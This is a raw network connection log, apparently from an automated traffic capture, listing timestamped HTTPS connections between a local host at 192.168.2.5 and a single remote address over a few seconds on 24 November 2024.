                                                                                                                                                                                        Nov 24, 2024 02:14:22.321952105 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.652152061 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.652825117 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.652852058 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.653412104 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.653436899 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.716681004 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.717334032 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.717367887 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.717885017 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.717890978 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.754456043 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.757538080 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.757657051 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.757683039 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.757683039 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.757699966 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.757710934 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.760821104 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.760854959 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.760922909 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.761080980 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.761096001 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.764034033 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.780258894 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.780276060 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.780777931 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.780783892 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.885622978 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.886282921 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.886297941 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:22.887157917 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:22.887162924 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.095875025 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.099282980 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.099353075 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.099436045 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.099450111 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.099469900 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.099478006 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.102545023 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.102565050 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.102637053 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.102783918 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.102799892 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.160949945 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.163902998 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.163970947 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.164050102 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.164067030 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.164081097 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.164087057 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.167249918 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.167290926 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.167367935 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.167516947 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.167526007 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.212352991 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215420961 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215461969 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215536118 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215573072 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215663910 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215663910 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215678930 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.215687990 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.219077110 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.219104052 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.219194889 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.219374895 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.219391108 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.328573942 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.331692934 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.331763983 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.331816912 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.331831932 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.331840992 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.331845999 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.335043907 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.335073948 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:23.335150957 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.335300922 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:23.335318089 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.574986935 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.575790882 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.575809956 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.576483011 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.576488018 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.824306965 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.825115919 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.825126886 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.825706005 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.825711966 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.932221889 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.932938099 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.932955027 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.933365107 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.933371067 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.963143110 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.964011908 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.964047909 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:24.964454889 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:24.964468002 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.018897057 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.021924019 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022039890 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022119045 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022119045 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022269964 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022269964 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022308111 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.022315025 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.025331974 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.025360107 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.025460958 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.025652885 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.025665045 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.049741030 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.050242901 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.050278902 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.050770044 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.050784111 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.256716013 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.260046005 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.260121107 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.260160923 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.260180950 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.260198116 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.260211945 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.263351917 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.263371944 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.263432026 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.263649940 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.263665915 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.366158009 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.369201899 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.369270086 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.369309902 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.369321108 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.369335890 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.369350910 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.372261047 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.372288942 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.372378111 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.373086929 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.373100996 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.444009066 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.447674990 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.447747946 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.447798014 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.447820902 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.447830915 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.447839022 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.450861931 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.450891972 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.450963020 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.451118946 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.451136112 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.484730005 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.487868071 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.487909079 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.487927914 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.487971067 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.488017082 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.488035917 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.488046885 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.488054037 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.490365028 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.490386009 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:25.490473032 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.490607023 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:25.490623951 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:26.746165037 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:26.746820927 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:26.746839046 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:26.747335911 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:26.747340918 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.048043013 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.050492048 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.050517082 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.050982952 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.050987959 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.151047945 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.151779890 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.151799917 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.152163029 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.152168989 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.180399895 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.183546066 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.183614016 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.183670998 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.183685064 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.183692932 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.183698893 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.188544989 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.188566923 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.188662052 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.188800097 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.188812017 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.204286098 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.206274033 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.206285954 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.206836939 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.206840992 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.295032024 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.295595884 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.295624018 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.296101093 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.296107054 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562292099 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562330008 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562375069 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562391996 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562426090 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562648058 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562665939 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562674046 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.562679052 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.565593004 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.565622091 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.565711021 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.565876961 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.565890074 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.681629896 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.681699991 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.681761980 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.681993961 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.682003021 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.682013988 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.682018995 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.685241938 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.685276031 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.685353994 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.685544968 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.685561895 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727006912 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727052927 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727132082 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727436066 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727436066 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727446079 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.727454901 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.730752945 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.730767012 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.730859995 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.731034994 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.731045008 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.762013912 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.765078068 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.765142918 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.765216112 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.765227079 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.765237093 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.765242100 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.768106937 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.768131018 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:27.768237114 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.768383980 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:27.768394947 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:28.968316078 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:28.969068050 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:28.969083071 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:28.969614029 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:28.969618082 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.364729881 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.365341902 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.365361929 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.365783930 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.365787983 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.411252022 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.414710999 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.414783001 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.414869070 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.414869070 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.414876938 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.414885998 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.417859077 CET49934443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.417898893 CET4434993413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.417984009 CET49934443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.418160915 CET49934443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.418179035 CET4434993413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.474294901 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.474889040 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.474906921 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.475352049 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.475357056 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.482063055 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.482331038 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.482337952 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:29.482669115 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:14:29.482672930 CET4434993313.107.246.63192.168.2.5
